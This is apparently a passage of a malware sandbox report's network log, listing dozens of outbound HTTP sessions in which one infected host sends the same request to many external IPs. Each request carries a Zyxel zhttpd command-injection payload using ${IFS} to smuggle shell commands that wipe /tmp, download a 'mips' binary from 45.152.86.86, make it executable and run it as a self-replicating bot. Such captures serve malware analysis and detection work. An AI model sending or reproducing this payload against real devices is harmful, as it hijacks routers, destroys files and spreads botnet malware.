                                        Mar 31, 2024 09:22:39.822357893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8880192.168.2.234075437.28.40.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.822406054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8881192.168.2.235940639.222.33.195443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.822455883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8882192.168.2.2346200129.24.236.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.822511911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8883192.168.2.235962288.58.11.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.822555065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8884192.168.2.2332830192.143.49.91443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.822594881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8885192.168.2.234495470.60.117.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.822643995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8886192.168.2.234304454.27.108.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.822685957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8887192.168.2.235308469.185.90.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.822725058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8888192.168.2.2350878132.51.157.239443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.822772026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8889192.168.2.2354952126.19.17.126443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.822834015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8890192.168.2.234193018.120.32.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.822865963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8891192.168.2.2354864148.243.193.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.822911024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8892192.168.2.235135041.52.217.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.822957039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8893192.168.2.234459445.87.25.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.823003054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8894192.168.2.234218054.194.172.178443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.823044062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8895192.168.2.2352826149.5.93.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.823097944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8896192.168.2.234040048.197.20.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.823147058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8897192.168.2.2342092182.77.69.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.823204994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8898192.168.2.235602283.28.127.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.823262930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8899192.168.2.2360064218.162.17.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.823293924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8900192.168.2.2358714203.126.3.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.823323965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8901192.168.2.235342243.214.1.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.823374033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8902192.168.2.2336142101.205.240.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.823412895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8903192.168.2.233454037.61.245.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.823460102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8904192.168.2.234487887.89.29.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.823513031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8905192.168.2.235678246.171.252.121443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.823565960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8906192.168.2.2353612130.124.56.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.823615074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8907192.168.2.2334748145.77.243.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.823662043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8908192.168.2.235321264.236.42.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.823700905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8909192.168.2.235311097.138.35.154443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.823729038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8910192.168.2.2354518139.50.168.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.823765993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8911192.168.2.235668664.187.21.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.823828936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8912192.168.2.2358772186.255.152.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.823873997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8913192.168.2.233934825.145.206.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.823911905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8914192.168.2.234572612.201.222.170443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.823967934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8915192.168.2.2335896136.146.51.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.824001074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8916192.168.2.2347696134.13.167.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.824042082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8917192.168.2.2345992122.177.0.58443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.824093103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8918192.168.2.2340980183.245.128.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.824136019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8919192.168.2.2347312133.55.168.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.824187994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8920192.168.2.233801857.39.189.91443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.824233055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8921192.168.2.2334458217.115.71.195443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.824285030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8922192.168.2.2341766120.18.165.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.824317932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8923192.168.2.2349422138.193.115.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.824353933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8924192.168.2.2341966145.188.10.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.824385881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8925192.168.2.233984694.45.156.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.824440002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8926192.168.2.2333058166.21.231.37443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.824481964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8927192.168.2.2336118139.253.85.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.824533939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8928192.168.2.234131020.16.173.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.824584961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8929192.168.2.234829258.67.111.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.824616909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8930192.168.2.235364293.139.148.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.824676991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8931192.168.2.2344610177.213.184.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.824711084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8932192.168.2.235333625.34.39.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.824770927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8933192.168.2.234765027.203.125.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.824819088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8934192.168.2.2334828197.106.158.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.824862003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8935192.168.2.235549682.72.84.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.824908972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8936192.168.2.2338548157.203.204.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.824939966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8937192.168.2.235407865.128.217.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.824997902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8938192.168.2.234904052.177.234.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.825047016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8939192.168.2.2358330104.190.114.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.825095892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8940192.168.2.2359304146.177.1.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.825143099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8941192.168.2.235973236.35.27.98443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.825181961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8942192.168.2.2349710181.4.161.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.825223923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8943192.168.2.2348998213.33.199.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.825268030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8944192.168.2.234853465.228.44.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.825316906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8945192.168.2.2350368207.235.108.129443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.825351954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8946192.168.2.2347016139.200.98.171443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.825419903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8947192.168.2.2345510136.2.249.94443
                                        TimestampBytes transferredDirectionData
